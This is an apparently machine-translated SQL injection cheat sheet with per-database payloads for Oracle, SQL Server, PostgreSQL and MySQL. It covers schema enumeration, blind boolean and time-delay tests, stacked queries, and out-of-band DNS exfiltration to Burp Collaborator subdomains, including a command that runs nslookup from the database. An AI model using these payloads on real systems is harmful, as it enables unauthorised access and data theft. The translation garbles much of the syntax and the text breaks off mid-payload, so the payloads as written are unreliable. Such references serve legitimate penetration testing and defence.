[2019] the hacker SQL injection attacks, command is equivalent to a memo. You can use this syntax to execute SQL injection attacks often occurs when the
String concatenation String concatenation
You can connect multiple strings together to form a string,
Oracle 'foo' | | 'bar'
Microsoft 'foo' + 'bar'
PostgreSQL 'foo' | | 'bar'
MySQL 'foo' 'bar' [Note the space between the two strings]
CONCAT (' foo ', 'bar')
Comments Comments
You can use comments to truncate the original query part of the query and delete after input,
Oracle - comment
Microsoft, the comment
/* comment */
PostgreSQL - comment
/* comment */
MySQL # comment
- comment [Note the space after the double dash]
/* comment */
The Database version Database type and version
You can query the database to determine its type and version, in more complex attack, this information is useful,
Oracle SELECT banner FROM v $version
SELECT the version FROM v $instance
Microsoft SELECT @ @ version
PostgreSQL SELECT version ()
MySQL SELECT @ @ version
The Database contents Database content
You can list that exist in the database tables and the tables contain columns,
Oracle SELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name='TABLE - NAME - HERE'
Microsoft SELECT * FROM information_schema. Tables
SELECT * FROM information_schema. The columns WHERE table_name='TABLE - NAME - HERE'
PostgreSQL SELECT * FROM information_schema. Tables
SELECT * FROM information_schema. The columns WHERE table_name='TABLE - NAME - HERE'
MySQL SELECT * FROM information_schema. Tables
SELECT * FROM information_schema. The columns WHERE table_name='TABLE - NAME - HERE'
Conditional errors condition error
You can test a single Boolean (Boolean) conditions, if the condition is true, then trigger the database error,
Oracle SELECT CASE WHEN (YOUR - CONDITION - HERE) THEN to_char (1/0) ELSE NULL END FROM dual
Microsoft SELECT CASE WHEN (YOUR - CONDITION - HERE) THEN 1/0 ELSE NULL END
PostgreSQL SELECT CASE WHEN (YOUR - CONDITION - HERE) THEN cast as text (1/0) ELSE NULL END
MySQL SELECT the IF (YOUR - CONDITION - HERE, (SELECT table_name FROM information_schema. Tables), 'a')
Batched queries (or stacked) batch query (or stack)
You can use the batch query to execute multiple consecutive query, please note that when performing subsequent query, the result will not return to the application, therefore, the technology is mainly used for problems with the blind holes, in the vulnerability, you can use the second query to trigger the DNS lookups, error conditions or time delay,
Oracle Does not support batched queries.
Microsoft QUERY - 1 - HERE; QUERY - 2 - HERE
PostgreSQL QUERY - 1 - HERE; QUERY - 2 - HERE
MySQL Does not support batched queries.
Time delays Time delay
Dealing with query, can lead to time delay in the database, the following conditions will lead to 10 seconds time delay unconditionally,
Oracle dbms_pipe. Receive_message ((' a '), 10)
Microsoft WAITFOR DELAY '0:0:10'
PostgreSQL SELECT pg_sleep (10)
MySQL SELECT sleep (10)
Conditional time delays Conditional time delay
You can test a single Boolean conditions, and trigger when condition is true time delay,
Oracle SELECT CASE WHEN (YOUR - CONDITION - HERE) THEN the 'a' | | dbms_pipe. Receive_message ((' a '), 10) ELSE NULL END FROM dual
Microsoft IF (YOUR - CONDITION - HERE) WAITFOR DELAY '0:0:10'
PostgreSQL SELECT CASE WHEN (YOUR - CONDITION - HERE) THEN pg_sleep (10) ELSE pg_sleep (0) END
MySQL SELECT the IF (YOUR - CONDITION - HERE, sleep (10), 'a')
DNS lookup DNS query
You can make the database outside the domain DNS lookups, therefore, you will need to use Burp client generation will be used in the attack the only Burp Collaborator subdomains, and polling Collaborator server to confirm whether the DNS lookups,
Under Oracle technology USES XML external entities (XXE) vulnerability to trigger the DNS lookup, the vulnerability has been patched, but there are many not repair the Oracle installation:
The SELECT extractvalue (xmltype (' & lt; ? The XML version="1.0" encoding="utf-8"?> ', '/l') FROM dual
These technology applies to the Oracle installation, complete ascension permissions:
The SELECT UTL_INADDR. Get_host_address (' YOUR-SUBDOMAIN-HERE.burpcollaborator.net ')
Microsoft exec master.. Xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'
PostgreSQL copy (SELECT ") to the program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net
MySQL under technology applies only to Windows:
The LOAD_FILE (' \ \ \ \ YOUR-SUBDOMAIN-HERE.burpcollaborator.net \ \ a ')
The SELECT... INTO OUTFILE '\ \ \ \ YOUR-SUBDOMAIN-HERE.burpcollaborator.net \ a'
DNS lookup with data exfiltration DNS lookups and penetration data
You can make the database to include into the query results external domain DNS lookups, therefore, you will need to use Burp Collaborator client generation will be used in the attack the only Burp Collaborator subdomains, and polling Collaborator to retrieve any DNS server interaction of detailed information, including data were leaked,
Oracle SELECT extractvalue (xmltype (' & lt; ? The XML version="1.0" encoding="utf-8"?> ', '/l') FROM dual
Microsoft declare @ p varchar (1024); The set @ p=(SELECT YOUR QUERY - HERE). The exec (' master.. Xp_dirtree "//" + @ p + '. YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a "')
PostgreSQL create OR replace the function f () returns void as $$
Declare c text;
Declare p text;
The begin
SELECT into p (SELECT YOUR QUERY - HERE).
C:='copy (SELECT "' ') to the program ' 'nslookup' | | p | | 'YOUR-SUBDOMAIN-HERE.burpcollaborator.net' ' '.
The execute c;
END;
$$language PLPGSQL security definer;
SELECT (f);
MySQL under technology applies only to Windows:
SELECT YOUR QUERY - HERE INTO OUTFILE '\ \ \ \ YOUR - SUBDOMAIN - HERE. Burpcoll